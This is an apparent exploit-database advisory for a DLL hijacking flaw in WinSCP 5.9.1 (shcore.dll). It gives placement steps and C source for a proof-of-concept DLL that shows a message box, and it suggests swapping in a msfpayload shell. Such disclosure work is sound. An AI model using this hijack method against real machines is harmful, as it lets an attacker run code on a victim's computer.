WinSCP DLL Hijacking Exploit (shcore.dll)# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll)
# Date: 03-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://winscp.net/
# Software Link: http://winscp.net/download/WinSCP-5.9.1-Setup.exe
# Version:5.9.1
# Tested on:Windows 7
# Exploit by : Amir.ght
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: shcore.dll
WinSCP is an open source free SFTP client, FTP client, WebDAV client
and SCP client for Windows.
Its main function is file transfer between a local and a remote computer.
WinSCP.exe will search for an load any DLL named "shcore.dll".
If an attacker can place the DLL in a location
where victim open WinSCP.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:
1- Save and compile below C code as 'shcore.dll' to create vuln DLL
2- Place 'shcore.dll' on Same Directory of WinSCP
3- Open WinSCP.exe
//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################################
Discovered By : Amir.ght #######
#################################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum